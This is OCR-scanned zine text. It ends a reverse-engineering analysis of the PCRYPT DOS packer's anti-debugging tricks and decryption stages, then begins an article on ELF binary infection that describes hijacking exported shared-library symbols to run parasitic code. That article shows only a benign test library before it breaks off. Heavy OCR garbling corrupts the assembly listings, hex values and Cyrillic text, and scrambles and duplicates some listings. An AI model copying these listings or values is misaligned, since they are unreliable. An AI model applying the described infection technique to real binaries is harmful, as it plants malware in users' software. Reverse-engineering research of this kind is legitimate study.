Q000:0975 Q7 pop es 7; es = 0x0110 

0000: 0976 8bd6 mov dx, si ; dx = @x@8ab 

0000: 0978 bdQ000 mov bp, @ ; bp = 0 

Q000:097b fc cld ; Clear direction flag 


Note that both ds and es were set to the code segment offset by 0x10 - this effectively makes ds:0000 point to the 
beginning of the program (offset 0x100 in the load segment). Remember that the first 0x100 bytes in the program 
load segment is allocated for the PSP. 


The above code fragment set up registers for more string operations (lods/stos). ds and es are set with meaningful 
values, and finally, the direction flag is adjusted. Clear direction flag means the lods/stos operations will increment 
the si/di registers. 


Then there is some dummy code for obfuscation (these instructions do not do anything meaningful). There is two 
more constants loaded into the registers. cl, that used to carry the key byte, is loaded with initial value of 0x68, and 
bx is loaded with 0x537, which looks very much like the length of the original binary. Recall that the very first 
instruction of the COM file is a jump to 0x63a, or 0x537+0x100+0x03 (load offset + length of first jump). 


Q000:097c 9b wait ; Wait for BUSY# to go high 
0000:097d dbe3 fninit ; Initialize FPU 
0000: 097Ff b168 mov cl, @x68 ; Cl = 0x68 
0000: 0981 Obed or bp, bp ; Set zero flag (ZF=1) 
»-- 0000: 0983 7441 je 0x9c6 ; Jump is taken 
‘—> Q000:09c6 bb3705 mov bx, @x537 > bx = @x537 


Then we have more register set up related to the string instructions. The source index is set to 3, and the destination 
to 0. It should be now clear that this stage will copy (and decrypt in the process) the original program code, moving 
it from offset 0x103 (es:si) to 0x100 (es:di). 


»-- 0000:09c9 ebbc jmp 0x987 
: 0000:0985 33db xor bx, bx 
‘> Q000:0987 beQ300 mov si, 3 ; si = 0x03 
0000:098a bf0000 mov di, @ ; di = x00 
;; dS:Si points at the first byte of the executable 
;; (after the jmp 0x64a at the very beginning) 
(*)->0000: 098d ac lodsb al, byte [sil] ; al = ds:si, al = @x81. sit++ 
0000: 098e d2c@ rol al, cl ; Rotate al 
0000:0990 32c1 xor al, cl ; Xor al with 0x68 


The first byte of the payload is loaded into al, then al is rotated 0x68 times. The rotation does not change al because 
0x68 is a multiple of 8. Next al is xored with the constant value of 0x69 (cl). This is the first part of the decryption. 


However after this snippet there is a very unusual block of instructions. | will list it here and then go through them 
one by one. 


0000: 0992 cc int3 ; Call INT3 handler (cs:0832) 


0000:0993 fi int1 7 
0000:0994 ff invalid Af 
0000:0995 ff invalid 

0000:0996 d9da fnop A 
0000:0998 d9da fnop 

0000:099a QF23c8 mov dri, eax : 
0000:099d d9da fnop ; 
0000: 099Ff QF23d8 mov dr3, eax : 
0000:09a2 QOF20c0 mov eax, cra q 
0000:09a5 d9da fnop J 
0000: 09a7 QF22c0 mov crQ@, eax : 
0000:09aa d9dQ fnop 8 
0000: 09ac e€a00002700 Ljmp 0x27: . 


Call INT1 hanlder (cs:@8ab) 
Trigger INT6 handler 


INT6 handler returns here 


Scrap the debug registers 


; just in case someone’s watching 


; Do funny stuff with crd 


; Jump to linear address 0000 0270 


Let’s trace what this code fragment will execute. First, let’s take a look at cs:0842 which is the current INT3 interrupt 
handler... 


-—> 


;; This procedure leaves ax (ah,al) clobbered 


Register state at 


+; ax = 01e9 
ss al = e9 ah = 
5; Si = 0003 di = 
5; bx = 0537 
5; dx = @8ab 


the end: 


Q1 
0000 


cl = 68 


0000: 0842 56 push si 

0000: 0843 le push ds 

0000:0844 51 push cx 

0000:0845 Qe push cs 

0000:0846 1f pop ds 

0000: 0847 6650 push eax 

0000: 0849 fc cld 

0000:084a QF20c0 mov eax, cra 
0000: 084d QOF22c0 mov crQ@, eax 
0000: 0850 6658 pop eax 

0000: 0852 e€80000 call @x845 
Q000:0855 5e pop si 

0000: 0856 50 push ax 

0000:0857 8bc6 mov ax, Si 
Q000:0859 81c6a303 add si, @x3a3 
0000: 085d Q57901 add ax, 0x179 
0000: 0860 3904 cmp word [si], ax 
0000: 0862 58 pop ax 

0000: 0863 7205 jb @x85a 

0000: 0865 Qf23d2 mov dr2, edx 
0000: 0868 8914 mov word [si], dx 
0000: 086a Ff04 inc word [sil] 
0000:086c 8b34 mov si, word [sil] 
0000: 086e 4de dec si 

0000: 086Ff 8aed mov ah, al 
0000:0871 ac lodsb al, byte [sil] 
0000:0872 32e0 xor ah, al 
0000:0874 8ac4 mov al, ah 

0000: 0876 59 pop cx 

0000:0877 1f pop ds 


it also reads the initial storage area value from dx 
Saved cs:ip points to next instruction (cs:0993) 


; ah= 
; Load second ciphertext 


source and destination pointers 
size of decrypted binary? 


; This procedure decrypts the final (?) stage of the binary 
al - ciphertext byte 


Save si, ds, cx 


ds = cs; 
Save eax; 
Clear direction flag 


Do nothing with crd 
Restore eax 


si = @x855 

stack words = ax cx ds si 
ax = @x855 

si = Oxbf8 

ax = @x9ce, si + 0x179 


Compare 9ce and x«(cs:Qbf8) 
Restore ax 

Jump if below (CF=1) 

Write dx to dr2 

Load dx (8ab) to cs:0bf8 


Increase the counter (Q@xbf8) 
Load counter to si 
Decrement si 

al 


; ah *= al —- decrypt 


Move cleartext byte to al 


0000:0878 5e pop si ; Restore si, ds, cx 
0000: 0879 cf iret ; Return from interrupt. 


In this part, after ax is restored at 862, al contains the result of the xor at 990. Then al is saved int ah. si is 
overwritten with the counter from the storage area and then used to load al with the new value (lodsb). ah is xored 
with the new al value, and the result is moved back to al. This is the second XOR operation that completes the 
decryption. Pointers to two ciphertext values have been incremented. The pointer used for the second al load needs 
to be incremented manually (inc m16 at 86a). 


After the INT3 handler ends, the CPU will execute the int1 instruction at 993 and execution will continue at cs:08ab 
which is the 
current INT1 handler (set at 967)... 


Q000:08ab aa stosb byte es:[di], al ; Save al to es:di, dit+ 
0000: 08ac cf iret ; Return from interrupt 


This handler saves the decrypted value in al to es:di. This concludes processing 1 byte of the ciphertext. 
The encryption algorhitm here is the most sophisticated so far. It is based on two XORs, but this time, the ciphertext 
is xored with it’s previous bytes in order to avoid using a constant value (stage 3) or a (limited length) key lookup 


table, as it was the case of stage 2. Additionally, the byte is rotated and pre-xored with a rolling key. 


This is a simple stream cipher, but the implementation is intentionally obfuscated. 
I’ve drawn out the schematic of the cipher below (@ sign denotes the instruction address): 


. @871 
ffff [cntr] >------------------ + @872 

-->0000 [ di ] (X)---. 

: 0001 [ ] cl++ -.------- . : A | 
0002 [ ] : (X)--' : -ll_ 
0003 [ si ] >---[ rol ]->--’ @990 : \ / 
Q004 ... @98d @98e : \/ 

@8ab while bx-- != Q; 


Alternatively, to use cryptographic notation: 


m(n) = rol( c(n+3), cl(n)) xor 0x68 xor c(n-1) ; 
cl(n) = (0x68 + n ) & OxFF; 
m — message, c — ciphertext; m(n) - nth message symbol (byte) and so on. 


Here’s the C code that | used: 


al = memory([si++]; 
al = rol(al, cl); 
al=al%* cl; 


counter++; 

ah = al; 

al = memory[counter-1]; 
ah = ah ~ al; 

al = ah; 


memory [dit++] = al; 


cl++; 


bx-——; 


while (bx != 0); 


And my implementation of the rol r/m8, cl operation: 


rm8, 


tmp = rm8 | rm8<<8; 


tmp >>= (8 - cl % 8)); 
return tmp & Oxff; 


After the INT1 handler ends, the execution continues at the two invalid instructions (cs:0994), which causes the INT6 
(#UD) handler to be executed (cs:081 8): 


0000: 0818 QF23d6 mov dr2, esi ; 

Q000:081b Qf23c6 mov dr@, esi ; 

0000:081e Q@f23ce mov drl, esi ; 

0000:0821 Qf23de mov dr3, esi ; Set all breakpoints to esi 
0000: 0824 fecl inc cl ; Increase cl 

;; int 6 handler earlier set by code at 77e 

0000:0826 Qf23d0 mov dr2, eax ; Set dr2 to eax 

0000:0829 55 push bp 

0000:082a 8bec mov bp, sp 

0000: 082c 83460202 add word [bp + 2], 2 ; Move the saved ip 2 bytes ahead 
0000:0830 5d pop bp 

0000: 0831 cf iret ; Finish servicing the isr 


Which will move the instruction pointer two bytes forward to the fnop instructions at 0996: 


0000:0996 d9da fnop ; INT6 handler return here 
0000:0998 d9da fnop 

0000:099a Qf23c8 mov dri, eax ; Scrap the debug registers 
0000:099d d9da fnop ; Just in case someone is watching 
0000: 099Ff Qf23d8 mov dr3, eax ; Ditto 

0000: 09a2 QOF20c0 mov eax, cra : 

0000:09a5 d9da fnop ; 

0000:09a7 QF22c0 mov crQ@, eax ; Do funny stuff with crQ 
0000:09aa d9da fnop 

0000: 09ac ea00002700 Ljmp 0x27: ; Jump to linear address 0000 0270 


You may be wondering what is at the address 0000:0270? Well, remember the strange writes to 0000:0270 by the 
code at 0928? 


0000: 0928 c7067002ea00 mov word [@x270], QOxea ; Set 0000:0270 to ea 00 
Q000:092e 8bc6 mov ax, Si ; ax = Qx6be 

0000: 0930 Q5f302 add ax, @x2f3 ; ax = Qx9b1 

0000: 0933 a37102 mov word [@x271], ax ; Set 0000:0271 = ax 
0000: 0936 8c0e7302 mov word [@x273], cs ; Set 0000:0273 = cs 


;; Note that while my listing shows the leading code segment as 0000 throughout 
;; the whole text, cs is in fact far away in memory, pointing where the DOS loader 
;; loaded the original COM file and then moved back by 1 as stage 3 was executed. 


This data will now be jumped to and executed: 
;; The segment listed here is in fact zero 


;; Jump to pointer (cs:09b1) that was written here at 0933 
0000:0270 ea b109:[cs] jmp ptr16:32 


The execution will continue at cs:09b1, that is 


Q000:09b1 4b dec bx 
0000: 09b2 75d9 jne 0x98d 


This decrements bx, and if its not equal to zero, jumps back to cs:098d which starts the process of decrypting the 
next byte. The location 98d is marked with a (*) in the listing. 


If bx is zero, then the jump is not taken and the code continues execution: 


0000: 09b4 Obed or bp, bp 

0000: 09b6 7413 je @x9cb ; Jump taken 

7; Call the function that checks for constants in the idle interrupt handler again 

0000: 09cb e8acfe call @x87a 

0000:087a 6a00 push @ 

0000: 087c 1f pop ds 

0000: 087d c536a000 lds si, [0xa] 

0000:0881 ad lodsw ax, word [sil] 

0000: 0882 3d9cfb cmp ax, Oxfb9c 

0000: 0885 750c jne 0x893 

0000:0887 ad lodsw ax, word [sil] 

0000: 0888 3d3d55 cmp ax, 0x553d 

0000: 088b 7506 jne 0x893 

0000:088d ad lodsw ax, word [si] 

0000: 088e 3d2d75 cmp ax, 0x752d 

0000: 0891 7401 je 0x894 

0000:0893 c3 ret ; Side effect, ds = 0000 

0000: 09ce Q7 pop es ; 

0000: 09cTf 1f pop ds ; Set es and ds = 0100 

0000: 09d0 le push ds ; 

Q000:09d1 06 push es : 

0000: 09d2 e80000 call @x9d5 

Q000:09d5 5e pop si 

0000: 09d6 83c628 add si, 0x28 ; si = 0x9fd 

0000:09d9 90 nop 

0000:09da Ge push cs 

0000: 09db Q7 pop es ; es = CS 

Q000:09dc 8cd8 mov ax, ds ; 

0000: 09de 051000 add ax, 0x10 ' 

Q000:09e1 8ed8 mov ds, ax ; Move ds by 0x10 

Q0000:09e3 2e0104 add word cs:[si], ax ; Self modyfying code again, 
; word cs:9fd = ds+0x10 

0000: 09e6 83c605 add si, 5 ‘ 

0000:09e9 90 nop 

0000: 09ea 2e0104 add word cs:[si], ax ; word cs:aQ@2 = ds + 0x10 

0000:09ed Q7 pop es 

Q000:09ee 1f pop ds 

0000: 09ef 61 popaw 

0000: 09fO bQ01 mov al, 1 . 

0000:09f2 3c@1 cmp al, 1 ; I will let you guess 

0000:09T4 7409 je Ox9ff ; if this is taken or not 

0000:09T6 60 pushaw 

0000:09T7 le push ds 

0000: 09f8 06 push es 

0000:09T9 b80000 mov ax, 0 

0000:09fc bbQ000 mov bx, 0 ; Immediate value changed, 

0000: 09f fF ea0001f07c ljmp @x____:0x100 ; jump to linear address 

Q@a02 ; target segment is modified 


; by add at 9ea 


Sometimes when the thing you are looking at does not make sense at all, it’s worth to take a few steps back and 
look around. At first the instructions from 90e onwards didn’t make any sense at all, because | had made an error 
when rewriting the stage 1 decryptor program. Originally it was loading the COM file into an array. Because of the 
COM load offset, all array accesses needed to be offset as well. This was bad for code readability. | rewrote the 
code to use a larger array and load the file at 0x100 offset. 


But | forgot to remove the offset from the length constant, which means the last 0x100 bytes to be decrypted by 
stage 1 were never decrypted. But when | fixed that error, suddenly the beginning of stage 3 code became 
curreupted. | already analyzed it at that point and | knew that there needed to be correct code there. Something was 
wrong. 


Then it hit me: the stage 2 key LUT start at 9f4 and goes up to be2. It should NOT be overwritten! This breaks the 
encryption! The original code overwrites the first 30 bytes of the stage 2 key lookup table, thus breaking the first 30 
bytes of stage 3 code. There is a bug in this particular packer version! 


| changed stage 1 code to end demangling at 9f3, and suddenly the code in both stage 3 and 4 made perfect sense. 
| think that this version of PCRYPT is broken, because | cannot find any other executables that use it online. There 
are a few v3.45 pcrypt binaries. There’s a file list of a russian BBS that lists two distributions of PCRYPT - v3.44 and 
v3.45. According to that file, version 3.45 was released just 12 days after 3.44: 


PCRYP345.RAR 27417 02-09-97 +=============| PCRYPT v3.45 O=+ 
I +-------- Tl 
I |Wudposunk COM uv EXE-obannos| Ill 
Po — oe oe "ae 8 oe + Ill 
I w Bsictpo pabotaert. Ill 
I w He6onbuon pa3zmep. Ill 
I. w 3auwuvta oT oTnagku. Tl 
I w 3auuta oT u3mMeHeHun. Ill 
I w MonvHoctbiw Ha Accem6nepe. Ill 
I w fMepcoHanbHas peructpauna. Ill 
{-_--_-_---—~---------+-==-- ll 
I Copyright (c) 1997 by MERLiN Ill 
fosssss========[ Q1 Sep 1997 J=+ll 


; //\\ 

; stage :/_||_ 

; -ll- 

+; INT3 handler 

Q000:0842 56 push si ; 

0000:0843 le push ds ; 

0000: 0844 51 push cx ; Save si, ds, Cx 
0000:0845 Qe push cs 7 

0000: 0846 1f pop ds 2 dS = ¢S* 

0000: 0847 6650 push eax ; Save eax; 

0000: 0849 fc cld ; Clear direction flag 
0000:084a QF20c0 mov eax, cra : 

0000: 084d QF22c0 mov crQ@, eax ; Do nothing with crQ@ 
0000: 0850 6658 pop eax ; Restore eax 
0000:0852 e80000 call @x845 . 

0000:0855 5e pop si > Si = @x855 

0000: 0856 50 push ax ; stack words = ax cx ds si 
0000: 0857 8bc6 mov ax, Si ; ax = Qx855 


-—> 


si = Oxbf8 

ax = @x9ce, si + 0x179 
Compare 9ce and x*(cs:Qbf8) 
Restore ax 

Jump if below (CF=1) 

Write dx to dr2 

Load dx (8ab) to cs:@bf8 
Increase the counter (@xbf8) 
Load counter to si 
Decrement si 

ah = al 

Load second ciphertext 

ah *= al —- decrypt 

Move cleartext byte to al 


Restore si, ds, cx 
Return from interrupt. 


; ds = 0000 


INT28 handler - DOS Idle Interrupt 


; ax = dsisi, si += 2 


; Return from call 
; Invalid address 


; bp = sp 
; Set return ip to si 

; Set return segment to cs 

; Clear eax 

; Clear all bp conditions 

; Clear drQ 

; Continue execution at cs:si 


al; Save al to es:di, dit++ 
; Return from interrupt 


Call subroutine at 87a 
es = 0100 (cs) 
ds = 0100 (cs) 


PIT command b6: chi, 
acces lo/hi, mode 2, 16 bit 


Q000:0859 81c6a303 add si, 0x3a3 
0000:085d Q57901 add ax, 0x179 

0000: 0860 3904 cmp word [si], ax 
0000:0862 58 pop ax 

0000:0863 7205 jb @x85a 

0000:0865 Qf23d2 mov dr2, edx 
Q000:0868 8914 mov word [si], dx 
0000: 086a Ff04 inc word [sil] 

0000: 086c 8b34 mov si, word [si] 
0000: 086e 4e dec si 

0000: 086f 8aed mov ah, al 
Q000:0871 ac lodsb al, byte [sil] 
0000:0872 32e0 xor ah, al 
Q000:0874 8ac4 mov al, ah 
0000:0876 59 pop cx 

0000:0877 1f pop ds 

0000:0878 5e pop si 

Q000:0879 cf iret 

;; Interrupt code check function 

Q000:087a 6a00 push @ 

Q000:087c 1f pop ds 

0000:087d c536a000 lds si, [0xaQ] 

;; load ds:si with segment:offset from QxaQ, 
0000: 0881 ad lodsw ax, word [sil] 
0000:0882 3d9cfb cmp ax, @xfb9c 
0000:0885 750c jne @x893 
Q000:0887 ad lodsw ax, word [sil 
0000: 0888 3d3d55 cmp ax, 0x553d 
Q000:088b 7506 jne @x893 
0000:088d ad lodsw ax, word [sil 
0000: 2088e 3d2d75 cmp ax, 0x752d 
Q000:0891 7401 je 0x894 

0000: 0893 fea] ret 

0000:0894 eav000dt fff Ljmp Oxffff:@ 

;; INT1 handler. ISR stack words are = ip cs flags 
0000:0899 8bec mov bp, sp 

0000: 289b 897600 mov word [bp], si 
0000: 089e 8c4e02 mov word [bp + 2], cs 
0000: 08a1 6633c0 xor eax, eax 

0000: 08a4 OF23f8 mov dr7, eax 

0000: 08a7 QF23c0 mov drQ@, eax 

0000: 08aa cf iret 

;; new INT1 handler 

0000:@8ab aa stosb byte es: [dil], 
0000: 08ac cf iret 

7; stage 4 entry point 

0000: 08ad e8caff call @x87a : 
Q000:08b0 Q7 pop es ; 
0000:08b1 1f pop ds ; 
0000:08b2 61 popaw 

0000:08b3 60 pushaw 

0000:08b4 le push ds 

0000:08b5 06 push es 

0000: 08b6 bOb6 mov al, Q@xb6 5 
Q000:08b8 e643 out 0x43, al i. 
Q000:08ba bOff mov al, Oxff is 
Q000:08bc e640 out 0x40, al : 
Q000:08be e640 out 0x40, al : 


Load Oxffff to PIT ch 1. 


0000: 08c0 b430 mov ah, 0x30 ; INT 21h, ah=0x30: 
Q0000:08c2 cd21 int @x21 ; Get DOS version 

0000: 08c4 3c@2 cmp al, 2 ; Compare maj version with 2 
0000: 08c6 7305 jae Q@x8cd ; Jump above or equal 

0000: 08c8 33c0 xor ax, ax ; ax = 0 

Q000:08ca 06 push es 7 eS = cS 

0000: 08cb 50 push ax 

0000: 08cc cb retf ; Pull cs:0000 and jump there 
0000: 08cd b430 mov ah, 0x30 

0000: 08cf cd21 int @x21 ; Get DOS version again 

;; PSP:@2 segment of first byte beyond memory allocated to program 

0000: 08d1 8b2e0200 mov bp, word [2] ; bp = *(@100:0002); 

;7 PSP:2c DOS 2+ environment for process 

0000:08d5 8b1e2c00 mov bx, word [@x2c] ; bx = *(0100:002c) 
0000: 08d9 bf5553 mov di, @x5355 > di = @x5355 “SU” 

0000: 08dc b94b43 mov cx, @x434b ; CX = 0x434b “CK” 

0000: 08df b430 mov ah, 0x30 ; Get DOS version (3rd time) 
0000: 08e1 cd21 int x21 . 

0000: 08e3 3c@2 cmp al, 2 ; Either case continues 
0000: 08e5 7300 jae Q@x8e7 : code execution. 
Q000:08e7 33c0 xor ax, ax 

0000: 08e9 bf0000 mov di, @ 

0000: 08ec 8b00 mov ax, word [bx + sil 

0000: 08ee 90 nop 

0000: O8ef 2bf7 sub si, di 

0000: 08f1 bf5553 mov di, @x5355 ; SUCK again 

0000: 08f4 b94b43 mov cx, @x434b 

0000: 08f7 e80000 call Qx8fa ; 

0000:08fa 5e pop si ; Si = Qx8fa 

0000: 08fb 81c6fee2 add si, @x2fe ; Si = Oxbf8 

0000: O8f f 2ec704f fff mov word cs:[si], Oxffff ; cs:O0bf8 = Oxffff 
0000: 0904 e€80000 call 0x907 es 

Q000:0907 5e pop si ; = 0x907 

;; Si = Ox6be now points at start of what stage 1 decrypted (cs has changed) 
0000: 0908 81ee4902 sub si, 0x249 ; Si = @x6be 

0000: 090c le push ds ; Save ds. stack = Q1 00... 
0000: 090d 6a00 push @ Hae 

0000: 090Ff 1f pop ds i ds = 0000 

0000:0910 8bc6 mov ax, Si ax = @x6be 

77 aX = Ox842 points at start of what stage 3 decrypted (cs has changed) 
0000:0912 Q58401 add ax, 0x184 7 ax = Qx842 

0000:0915 a30c00 mov word [@xc], ax f 

0000:0918 8c0e0e0O mov word [@xe], cs ; Set INT3 to cs:0842 
0000:091c 8bc6 mov ax, Si ; ax = Qx6be 

0000:091e Q56a01 add ax, @x16a 7 ax = 0x828 

0000:0921 a31800 mov word [0x18], ax ; 

0000:0924 8c0e1a00 mov word [@xla]l, cs ; Set INT6 to cs:0828 
0000:0928 c7067002ea00 mov word [0x27], @xea ; Set 0000:0270 to ea 00 
Q000:092e 8bc6 mov ax, Si ; ax = Qx6be 

0000: 0930 Q5f302 add ax, @x2f3 7; ax = Qx9b1 

0000: 0933 a37102 mov word [0x271], ax ; Set 0000:0271 = ax 
0000: 0936 8c0e7302 mov word [0x273], cs ; Set 0000:0273 = cs 
0000:093a 56 push si ; stack = be 06 

0000: 093b e€80000 call Qx93e 7 

0000: 093e 5e pop si F = @x93e 

0000: 093f 56 push si ; stack = 3e 09 be 06 
0000: 0940 83c61d add si, @x1d = @x95b 

0000:0943 90 nop 

0000: 0944 66b84de80f00 mov eax, Oxfe84d ; 

0000:094a QF23c0 mov drQ@, eax ; Set @xfe84d as breakpoint @ 
0000: 094d 666803000000 mov eax, 3 H 

0000: 0953 OF23f8 mov dr7, eax ; Set breakpoint @ conditions 


0000:0956 ead4de800fd 
;; Long jump triggers INT1 
0000: 095b 5e 
0000:095c 81c66df fF 
0000:0960 6a00 
0000: 0962 1f 

0000: 0963 89360400 
0000: 0967 8c0e0600 
0000: 096b 5e 

0000: 096c 1f 

0000: 096d 8cd8 
0000: 096f Q51000 
0000:0972 8ed8 
0000: 0974 le 
0000:0975 07 

0000: 0976 8bd6 
0000: 0978 bd0000 
Q000:097b fc 
0000:097c 9b 
0000:097d dbe3 
0000: 097Ff b168 
0000: 0981 Obed 
0000: 0983 7441 
0000:0985 33db 
0000: 0987 bed300 
0000:098a bf0000 


;; dS:Si points at the first byte of the executable 
;; (after the jmp 0x64a at the very beginning) 
lodsb al, byte [sil] 


(*«)->0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 


0000: 
0000: 
0000: 
0000 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 
0000: 


098d 
098e 
0990 
@992 
Q993 
@994 
@995 
0996 
0998 
099a 
099d 
Q99Ff 
Q9a2 
@9a5 
Q9a7 
Q9aa 
Q@9ac 


09b1 
09b2 
09b4 


:09b6 


Q9b8 
Q@9b9 
@9bb 
Q@9be 
09c0 
Q9c2 
09c4 
Q9c6 
Q9c9 
Q9cb 
09ce 


d9da 


Limp @xf000:0xe84d 


pop si 


add si, Oxff6d 


push @ 
pop ds 


mov word [4], si 
mov word [6], cs 


pop si 

pop ds 

mov ax, ds 
add ax, 0x10 
mov ds, ax 
push ds 

pop es 

mov dx, Si 
mov bp, 0 
cld 

wait 

fninit 

mov cl, x68 
or bp, bp 

je 0x9c6 

xor bx, bx 
mov si, 3 
mov di, @ 


rol al, cl 
xor al, cl 
int3 

intl 

invalid 
invalid 

fnop 

fnop 

mov dri, eax 
fnop 

mov dr3, eax 
mov eax, cra 
fnop 

mov crQ, eax 
fnop 

Ljmp 0x27: 


dec bx 

jne @x98d 
or bp, bp 
je @x9cb 
dec bp 

mov ax, ds 


add ax, 0x1000 


mov ds, ax 
mov eS, ax 

or bp, bp 

jne Qx987 

mov bx, 9x537 
jmp 0x987 
call @x87a 
pop es 


’ 


ee ee ee 


we we we we we ee 


we we we we we we 


; Jump to lin.address = Q00f e84d 


@x03e 
@x08ab 


si 
si 


(overflow) 


Set INT 1 handler to cs:Q8ab 


si = Qx6be 

ds = 0x0100 
ax = 0x0100 
ax = 0x0110 
ds = 0x0110 
es = 0x0110 
dx = @x08ab 
bp = @ 


Clear direction flag 

Wait for BUSY# to go high 
Initialize FPU 

cl = Qx68 

Set zero flag (ZF=1) 

Jump is taken 


@x03 
@x00 


si 
di 


al = ds:si, al = 0x81. si++ 
Rotate al 

Xor al with 0x68 

Call INT3 handler (cs:0832) 
Call INT1 hanlder (cs:@8ab) 
Trigger INT6 handler 

INT6 handler returns here 
Scrap the debug registers 


Just in case someone’s watching 


Do funny stuff with crQ@ 


Jump to linear address 0000 0270 


Jump taken 


; bx = @x537 


0000: 09cTf 1f pop ds ; Set es and ds = 0100 


0000: 09d0 le push ds : 

Q000:09d1 06 push es ; 

0000: 09d2 e€80000 call @x9d5 

0000:09d5 5e pop si 

0000: 09d6 83c628 add si, @x28 ; si = Ox9fd 

0000: 09d9 90 nop 

0000:09da Ge push cs 

0000: 09db 07 pop es ; eS = cS 

0000: 09dc 8cd8 mov ax, ds : 

0000: 09de 051000 add ax, 0x10 ; 

0000:09e1 8ed8 mov ds, ax ; Move ds by 0x10 

0000: 09e3 2e0104 add word cs:[si], ax ; self modyfying code again, 
; word cs:9fd = ds+0x10 

0000: 09e6 83c605 add si, 5 5 

Q000:09e9 90 nop 

0000:09ea 2e0104 add word cs:[sil, ax ; word cs:a@2 = ds + 0x10 

0000: 09ed Q7 pop es 

Q000:09ee 1f pop ds 

0000: 09ef 61 popaw 

0000: 09fO bQ01 mov al, 1 ; 

0000:09f2 3c@1 cmp al, 1 ; I will let you guess 

0000: 09T4 7409 je Ox9ff ; if this is taken or not 

0000: 09f6 60 pushaw 

0000: 09f7 le push ds 

0000:09f8 06 push es 

0000: 09f9 b80000 mov ax, 0 

0000: 09Ffc bb0000 mov bx, @ ; Immediate value changed 

0000: 09f fF ea0001f07c ljmp @x :0x100 ; Jump to linear address 


;; There are a few nonsense instructions here, then the PCRYPT banner starts 


Stage 4 calls the code at [0x7cf0+ds+0x10]:0100. | think this is a good point to end this analysis as | have not de- 
crypted what lands there, and this file is getting long. | hopeyou enjoyed this read and learnt something new. 


Reverse engineering this packer was a very valuable journey into static analysis and DOS programming. It expanded 
my x86 knowledge greatly and was a lot of fun to do. It’s not finished yet, as stage 4 jumps to more code that still is 
not the original binary. And after | crack that part, | still have to reverse the original program :) ... 


Overall | really like the design of this packer. It’s a COM file that just keeps on giving. | have no guarantee that stage 
5 will be the last one, there is still a few hundred bytes that were not touched yet. There is an unpacker for it - but | 
thought that documenting how the program works, both in terms of encryption/obfuscation of the original binary, as 
well as it’s own contents, is valuable not only for me but also for others. This is the main reason why | wrote so much 
of this text instead of just my own comments on the side of the disassembled code. 


I’ve been using the following materials during this project: 


- Intel 80386 Programmer’s Reference Manual (there is a nice 1986 typed copy online) 
- Ralph Brown’s Interrupt List (RBIL) 

- OSDEV wiki 

- David Jurgens helppc (HTTP mirror: https://stanislavs.org/helppc/ ) 


These are indispensable when doing DOS reverse engineering. For learning x86 (and other) assembly language, 
through reverse engineering (and static analysis!), | recommend Dennis Yurichev’s book “Reverse Engineering for 
Beginners”, known as RE4B. 


As for disassembler, due to the sheer amount of comments | had to add, | just copied radare’s output into a text file 
and then worked on that. Ghidra and IDA would probably work well too for disassembly. r2’s and ghidra’s 
decompilers are no good for it. 

That’s all for this work. If you liked this text, have some comments, or just want to say hello, drop me a line at 
gorplop@sdf.org. 


Cheers 


~gorplop 


— 
———— 
ey SS <7 


ARE 
RANSOM eR ATOR 


ELF Binaries: One Algorithm to Infect Them All 
Authored by sad0p 


ELF (Executable and Linking Format) is the standard format for organizing data and code that will occupy a pro- 
cess’s image and its memory dump when a crash occurs (commonly referred to as a “core dump”) in Unix-like 
environments. You can find the format utilized for executable binaries, shared object files (files ending in .o), shared 
libraries/shared objects (files ending in .so), kernel modules (files ending in .ko), and firmware (files ending in .bin 
but contain program or application specific code and data embedded in ELF) on platforms including mobile phones, 
PCs, embedded systems (game consoles, IoT, IloT, etc.), and servers. Due to the popularity of the ELF format, there 
has been a steady stream of research into its instrumentation. One particular area of interest that we will focus on is 
the insertion of malicious code (referred to as parasitic code from here on out) into an ELF binary while keeping its 
original functionality. 


In this piece, we’ll walk through ELF binary infection through example. To get the most out of this, | encourage the 
reader to familiarize themselves with the ELF standard (see references at the end) or use it as a guide in parallel with 
the information here. 


Inserting parasitic code into an ELF binary is commonly called “ELF binary infection.” ELF binary infection at the 
“highest quality” often involves using infection algorithms. These algorithms generally target ELF under one of its 
use cases. For example, infecting an executable that is either dynamically or statically linked could be performed 
by infection algorithm, Text Segment Padding, or PT_NOTE to PT_LOAD on 32-bit or 64-bit Intel Architecture (we 
focus primarily on x86_64 and x86 architecture for the paper’s entirety). However, infecting a shared object (library) 
with either Text Segment Padding or PT_NOTE to PT_LOAD would present a hurdle for parasitic code execution, as 
most shared objects do not utilize an entry point (the dynamic/runtime linker and loader being one exception) and 
consequently won’t be executed directly by a user or the system. Instead, shared libraries via the dynamic linker 
(Id-linux-*.so.*) are mapped into the process’s image when the linker identifies dependencies (references to code or 
data not readily available in the executable but part of a shared object). 


One possible circumvention to this problem might involve hooking/hijacking an exported symbol in a shared library. 
You locate the symbol of the desired function in the .dsym section and change its value (the address) to that of your 
parasitic payload. Then when an application linked against the shared library calls, the function associated with the 
hijacked symbol would result in the execution of the parasite. 


funcl(); 
func2(); 


#include "testlib.h" 
main() { 
func1(); 


#include<stdio.h> 
#include "testlib.h" 


func1() { 
printf("This is funci\n"); 


func2() { 
printf("This is func2\n"); 


func2() { 


printf(“This is func2\n”); 


We compile testlib.c to produce testlib.so, our shared library: 
sh-5.1$ gcc -c testlib.c -o testlib.o -fPIC 


sh-5.1$ gcc -shared testlib.o -o testlib.so 


Our application (main.c), which will be compiled and dynamically linked against testlib.so as such: 


sh-5.1$ gcc main.c ./testlib.so -o main 


Running the application will produce the expected result. 
sh-5.1$ ./main 


This is funcl 


sh-5.1$ 


We can examine the exports of testlib.so with ‘radare2 (r2) 


sh-5.1$ radare2 -w testlib.so 
ERROR: Cannot determine entrypoint, using 0x00001040 


WARN: run r2 with -e bin.cache=true to fix relocations in disassembly 


-- Command layout is: <repeat><command><bytes>@<offset>. 


show 3 
hexdumps of 2@ bytes at 0x33 


[0x00001040]> iE 


[Exports] 

nth paddr vaddr bind type size lib name 
6 Qx@0001109 @x00001109 GLOBAL FUNC 22 funcl 
7 x@000111fF @x0000111f GLOBAL FUNC 22 func2 
[0x00001040]> 


For example: 3x20@@0x33 will 


From this, we can see that the symbol func’ has a value of 0x00001109 and func2 symbol has a value of 
0x0000111f. These values correspond to the address of func! and func2, respectively. We can verify this by running 


‘objdump -d testlib.so: 


0000000000001109 <func1>: 
1109- 55 
110a-: 48 89 e5 
110d: 48 8d 05 ec Oe 00 00 
1114: 48 89 c7 
